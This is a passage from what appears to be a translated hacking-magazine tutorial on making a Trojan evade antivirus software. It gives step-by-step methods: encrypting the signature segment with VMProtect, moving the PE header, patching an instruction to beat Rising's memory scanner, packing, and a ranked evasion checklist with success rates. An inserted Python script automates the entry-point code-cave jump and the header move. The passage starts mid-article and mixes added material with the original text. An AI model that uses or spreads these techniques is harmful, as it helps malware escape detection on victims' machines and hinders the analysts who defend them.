VMProtect is a next-generation software protector that protects code with a virtual machine and lets you choose which segments to encrypt, making the protected program much harder to analyse. It was originally used to make PcShare's .SYS file evade detection, with commendable results, and it performs well on ordinary files too. Here we use it to encrypt the segment starting at 0049FA7F, where the signature is. Open VMProtect, load the program, right-click anywhere in the "Dump" tab and choose "Go to address" (Figure 40). Enter 0049FA7F in the dialog and click OK to jump there, then click the "Add address" button (Figure 41), select the segment and finally click the "Compile" button to encrypt the segment starting at 0049FA7F (Figure 42).

_Move the PE header:_

This method is a must-learn, and I take the chance to offer it to readers in the hope that it helps your evasion work. What does moving the PE header achieve? First, long-term evasion; second, it protects the evaded file, because others cannot learn your method from it (A1Pass: to really achieve that you must also stop others from reading this article, so buy up this whole issue of X-Files!). Why?
Because some disassembly tools fail to load a program whose PE header has been modified. Let us first look at the PE header. Load the Trojan in WinHex (Figure 43). See the two letters "PE" in the figure? The position of that "P" is where the PE header begins; in my file it is 00000100. Look closely at Figure 43: the first hex byte of the row after "PE" is E0. With the Windows calculator, hex E0 is 224 decimal. What does it mean? It is the size of the PE header (strictly, it is the SizeOfOptionalHeader field at offset 0x14 into the header; the complete header block is the 4-byte "PE\0\0" signature, the 20-byte file header, this optional header, and the section table that follows it). WinHex shows 16 bytes per row, so 224 bytes is exactly 14 rows. Copy those 14 rows and save them, remember the end address of the PE header (mine is 000001EF), and zero-fill the header (Figure 44). Finally paste the saved header further up the file, at a lower offset, taking care not to overwrite the "This program must be run under Win32" string. Because the header has moved up, the region it occupies grows: ours now runs from 00000080 to 000001EF, 368 bytes or 0x170 in hex (Figure 45). Two things must move with it or the file will not load: the pointer at offset 0x3C of the DOS header (e_lfanew), which must be changed to the new offset (here 00000080), and the section table, which the loader expects immediately after the optional header.

_For Rising:_ Load the file in OllyDbg; simply replacing the first machine instruction, push ebp, with pop ebp is enough to hide from Rising's memory scanner. (The replacement changes what happens to the stack, so run the result to confirm it still works.)

_Compression packers:_ Packing is the rookie's patent: the operation is simple, but both the evasion effect and the "reputation" it carries are unsatisfactory. Still, applying a compression packer once the evasion work is done is well worth it.
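The two header edits described above, the new entry "head" from method 4 and the PE header move, as an added example that is not part of the original article or its author's tools: the same edits done with Python's standard library instead of OllyDbg, PEditor and WinHex, so the arithmetic (the jmp rel32, the entry-point RVA, e_lfanew, the section-table position) can be checked. The PE32 image is constructed here for the demonstration; its offsets and sizes are ours, not the article's. The example goes slightly beyond the text in that it also moves the section table and rewrites e_lfanew at 0x3C, which the loader needs, and grows the code section's VirtualSize so the cave is mapped. The 8-byte alignment requirement on the new header offset is our conservative choice, not something the article states. `stub_len = 8` corresponds to the three instructions copied in the listing (push ebp, mov ebp,esp, mov ecx,4).

```python
import struct

# Added example (not the article's code): the two PE-header edits done by hand in the
# text, in a form where the arithmetic can be checked. The sample PE32 is constructed here.
E_LFANEW_OFF = 0x3C      # DOS header field: file offset of "PE\0\0"
FILE_HDR_SIZE = 20       # IMAGE_FILE_HEADER
SECTION_HDR_SIZE = 40    # IMAGE_SECTION_HEADER

def make_sample_pe():
    """Constructed PE32: DOS header, Delphi-style stub text, NT headers at 0x100, one .text section."""
    dos = bytearray(0x100)
    dos[:2] = b"MZ"
    stub = b"This program must be run under Win32\r\n$"
    dos[0x40:0x40 + len(stub)] = stub
    struct.pack_into("<I", dos, E_LFANEW_OFF, 0x100)
    # push ebp / mov ebp,esp / mov ecx,4 (the three lines copied in the text), then xor eax,eax / pop ebp / ret
    code = bytes.fromhex("55 8BEC B904000000 33C0 5D C3")
    opt = bytearray(0xE0)                              # 0xE0 = SizeOfOptionalHeader for PE32 (the E0 seen in WinHex)
    struct.pack_into("<H", opt, 0, 0x10B)              # Magic: PE32
    struct.pack_into("<I", opt, 16, 0x1000)            # AddressOfEntryPoint (an RVA, not a VA)
    struct.pack_into("<I", opt, 28, 0x400000)          # ImageBase
    struct.pack_into("<II", opt, 32, 0x1000, 0x200)    # SectionAlignment, FileAlignment
    struct.pack_into("<II", opt, 56, 0x2000, 0x400)    # SizeOfImage, SizeOfHeaders
    struct.pack_into("<H", opt, 68, 2)                 # Subsystem: Windows GUI
    struct.pack_into("<I", opt, 92, 16)                # NumberOfRvaAndSizes
    file_hdr = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, len(opt), 0x102)
    text_hdr = struct.pack("<8sIIIIIIHHI", b".text", len(code), 0x1000, 0x200, 0x400, 0, 0, 0, 0, 0x60000020)
    image = bytearray(dos + b"PE\0\0" + file_hdr + opt + text_hdr)
    image += bytes(0x400 - len(image))                 # pad headers up to SizeOfHeaders
    image += code + bytes(0x200 - len(code))           # .text raw data; the zero tail is the code cave
    return image

def nt_offset(pe):
    return struct.unpack_from("<I", pe, E_LFANEW_OFF)[0]

def section_headers(pe):
    """Yield (header_offset, name, VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData)."""
    nt = nt_offset(pe)
    nsec = struct.unpack_from("<H", pe, nt + 6)[0]
    opt_size = struct.unpack_from("<H", pe, nt + 20)[0]
    first = nt + 4 + FILE_HDR_SIZE + opt_size          # the section table directly follows the optional header
    for off in range(first, first + nsec * SECTION_HDR_SIZE, SECTION_HDR_SIZE):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", pe, off)
        yield off, name.rstrip(b"\0"), vsize, va, rawsize, rawptr

def rva_to_offset(pe, rva):
    for _, _, vsize, va, rawsize, rawptr in section_headers(pe):
        if va <= rva < va + max(vsize, rawsize):
            return rawptr + (rva - va)
    raise ValueError("RVA %#x is not backed by any section" % rva)

def relocate_entry_stub(pe, stub_len):
    """Method 4 ("add a head"): stub_len must end on an instruction boundary (8 = the three lines in the text)."""
    pe = bytearray(pe)
    ep_field = nt_offset(pe) + 4 + FILE_HDR_SIZE + 16        # AddressOfEntryPoint inside the optional header
    old_ep = struct.unpack_from("<I", pe, ep_field)[0]
    ep_off = rva_to_offset(pe, old_ep)
    stub = bytes(pe[ep_off:ep_off + stub_len])
    need = stub_len + 5                                      # copied bytes + E9 rel32
    for hdr_off, _, vsize, va, rawsize, rawptr in section_headers(pe):
        cave = pe[rawptr + vsize:rawptr + rawsize]           # file slack after the section's real bytes
        if va <= old_ep < va + rawsize and len(cave) >= need and not any(cave[:need]):
            break
    else:
        raise ValueError("no zero-filled cave of %d bytes in the code section" % need)
    cave_rva = va + vsize
    resume = old_ep + stub_len                               # the fourth original instruction
    rel32 = (resume - (cave_rva + need)) & 0xFFFFFFFF        # jmp rel32 is relative to the end of the jmp
    pe[rawptr + vsize:rawptr + vsize + need] = stub + b"\xE9" + struct.pack("<I", rel32)
    struct.pack_into("<I", pe, hdr_off + 8, vsize + need)    # grow VirtualSize so the loader maps the cave
    struct.pack_into("<I", pe, ep_field, cave_rva)           # what the PEditor entry-point edit does
    return pe, old_ep, cave_rva

def move_pe_header(pe, new_off):
    """The PE-header move: shift the whole header block to new_off and fix the pointer at 0x3C."""
    pe = bytearray(pe)
    old = nt_offset(pe)
    nsec = struct.unpack_from("<H", pe, old + 6)[0]
    opt_size = struct.unpack_from("<H", pe, old + 20)[0]
    block_len = 4 + FILE_HDR_SIZE + opt_size + nsec * SECTION_HDR_SIZE
    stub_end = 0x40 + len(pe[0x40:old].rstrip(b"\0"))        # keep "This program must be run under Win32"
    if new_off % 8 or not (stub_end <= new_off < old):       # 8-byte alignment is our conservative choice
        raise ValueError("target must be 8-byte aligned and lie between the DOS stub and the old header")
    block = bytes(pe[old:old + block_len])
    pe[old:old + block_len] = bytes(block_len)               # zero the old copy first: the two ranges overlap
    pe[new_off:new_off + block_len] = block
    struct.pack_into("<I", pe, E_LFANEW_OFF, new_off)        # without this neither loader nor debugger finds it
    return pe

if __name__ == "__main__":
    sample = make_sample_pe()
    patched, old_ep, new_ep = relocate_entry_stub(sample, 8)
    print("entry point RVA %#x -> %#x" % (old_ep, new_ep))
    moved = move_pe_header(patched, 0x80)
    print("PE header at %#x -> %#x; new entry still maps to file offset %#x"
          % (nt_offset(sample), nt_offset(moved), rva_to_offset(moved, new_ep)))
```

Both functions work on a copy and return it, so the original image can be diffed against the result; the entry-point relocation only accepts a cave that is genuinely zero-filled and large enough for the copied bytes plus the 5-byte jmp, and the header move refuses a target that would overwrite the DOS stub text or that lies beyond the current header.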
The first step in packing for evasion is finding a good packer; have a look around the Pediy (Kanxue, "see snow") forum, where good packers often appear. I will not spend ink on the packing steps themselves; go and look for yourself, it is just a matter of using a piece of software.

With that, our Trojan evasion work is done: seven categories and 14 methods in total! I am afraid that is hard to take in all at once, so below I use a "Soviet-style education" approach and lay out the knowledge in this article systematically, so that readers can apply it and look things up later.

**AV-evasion operation sequence:**

1. Proactively look for places where signatures may be present
2. Locate the signature with CCL or similar tools and change it
3. Change as many import table functions as possible
4. Change the file header
5. Encrypt the segment with VMProtect
6. Move the PE header
7. Apply a compression packer

**AV-evasion analysis:**

_First, proactively look for possible signatures_
Operation notes: only substitute the registry and file-path information, and only with the safest substitutions; do not change other content, as it is easy to break things.
Advantages: prevents signatures from being defined on those spots later, and you get to enjoy some DIY and build your own "special edition" Trojan along the way.
Shortcomings: cannot achieve effective evasion on its own; the effect is not obvious.
Success rate: almost 100%; as long as nothing is mis-edited, the program runs normally after the changes.
_Second, change import table functions as far as possible_
Operation notes: move the import function names to a new location, preferably starting each function name's first letter at the beginning of a row, and pay attention to the rule for filling in the addresses; do not get it wrong.
Advantages: prevents signatures from appearing there later and interferes with signature location.
Shortcomings: cannot achieve effective evasion on its own; the effect is not obvious.
Success rate: as long as the operation is done correctly, 90% or more is basically guaranteed!

_Third, locate the signature with CCL or similar tools and change it_
Operation notes: this step needs patience and care above all. Back up promptly so that nothing is lost in an emergency.
Advantages: very targeted; the most effective evasion method.
Shortcomings: evades only one antivirus product at a time and cannot be aimed at several products together, and the evaded file has a short lifetime. It is also very time-consuming.
Success rate: in theory 100%, depending mainly on your programming and assembly foundations; in practice, with enough experience in the method, the success rate is remarkably high!

_Fourth, move the PE header_
Operation notes: be careful with the hexadecimal conversions, and do not forget the start and end positions.
Advantages: extends the evasion period; the killer move when the signature lies in the PE header!
It also protects the evaded file, so others cannot study our method.
Shortcomings: after this step, apart from packing, no further processing can be done on the Trojan file.
Success rate: about 75%; there are too many unsettled factors...

_Fifth, change the file header_
Operation notes: deleting information changes the file structure.
Advantages: saves time, and the evasion effect is also very obvious; an efficient method.
Shortcomings: the evasion does not last long.
Success rate: about 80%.

I just change the entry point and jump down from it. The effect is okay. The simplest method.